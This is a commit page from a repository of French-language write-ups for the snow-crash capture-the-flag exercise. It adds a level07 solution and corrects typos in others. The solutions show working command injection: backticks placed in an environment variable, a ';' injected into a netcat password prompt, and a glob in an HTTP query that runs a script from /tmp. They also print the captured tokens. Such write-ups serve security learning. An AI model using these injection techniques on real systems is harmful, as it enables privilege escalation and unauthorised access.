gbrochar
/
snow-crash
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

level07 + some typos

This commit is contained in:
gbrochar 2021-01-30 09:55:48 +01:00
parent 9a8692883d
commit ec32401d40
4 changed files with 29 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
level07/Ressources/solution Normal file
View File

@ -0,0 +1,23 @@
Il y a un binaire level07, on execute strings dessus.
Plusieurs chose interessantes, il y a un `echo %s`, si on arrive a faire en sorte que %s soit `getflag` alors on reussira le niveau.
Il y a aussi getenv, on peut donc deduire que l'env est utile au programme.
On execute le programme, il affiche level07. Au debut nous avons cru qu'il affichait le nom du binaire mais en le telechargeant sur mon PC,
il affichait gbrochar, on en deduit donc qu'il print le username via l'env
USER=`getflag` ./level07
ne change rien, il reste logname
LOGNAME=`getflag` ./level07
Check flag.Here is your token :
sh: 2: Syntax error: ")" unexpected
on rajoute des backslashs
LOGNAME=\`getflag\` ./level07
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
Cela marche

4
level09/Ressources/solution
View File

@ -1,4 +1,4 @@
dans le home de level09 il y a 9 fichier appartenant a flag09: dans le home de level09 il y a 2 fichier appartenant a flag09:
-rwsr-sr-x 1 flag09 level09 7640 Mar 5 2016 level09* -rwsr-sr-x 1 flag09 level09 7640 Mar 5 2016 level09*
----r--r-- 1 flag09 level09 26 Mar 5 2016 token ----r--r-- 1 flag09 level09 26 Mar 5 2016 token
@ -32,7 +32,7 @@ $ gcc Ressource/decode.c && ./a.out
le dernier charactere corespond au "\n" le dernier charactere corespond au "\n"
on peut donc se conecter ayu compte flag09 puis recuperer le mot de passe du level10 on peut donc se connecter au compte flag09 puis recuperer le mot de passe du level10

2
level11/Ressources/solution
View File

@ -18,7 +18,7 @@ $ nc localhost 5151
* On va essayer de lancer getflag en arretant la comande avec ';' * On va essayer de lancer getflag en arretant la comande avec ';'
$ nc localhost 5151 $ nc localhost 5151
> Password: ; /bin/getevn > /tmp/bingo > Password: ; /bin/getflag > /tmp/bingo
$ cat /tmp/bingo $ cat /tmp/bingo
> Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s > Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s

4
level12/Ressources/solution
View File

@ -8,7 +8,7 @@
# On ne poura donc pas executer de comande en tant que tel. # On ne poura donc pas executer de comande en tant que tel.
# mais on peut executer un fichier # mais on peut executer un fichier
# Dans un fichier /tmp/.TOTO ont va mettre le comptenue suivant: # Dans un fichier /tmp/.TOTO ont va mettre le contenu suivant:
#!/bin/sh #!/bin/sh
getflag > /tmp/.flag12 getflag > /tmp/.flag12
@ -18,6 +18,8 @@
$ nc -v localhost 4646 $ nc -v localhost 4646
> GET /?x=`/*/.TOTO` > GET /?x=`/*/.TOTO`
l'autocompletion change le * en tmp, ce qui nous permet d'executer dans tmp malgre la regex qui upcase.
$ cat /tmp/.flag12 $ cat /tmp/.flag12
> Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr > Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr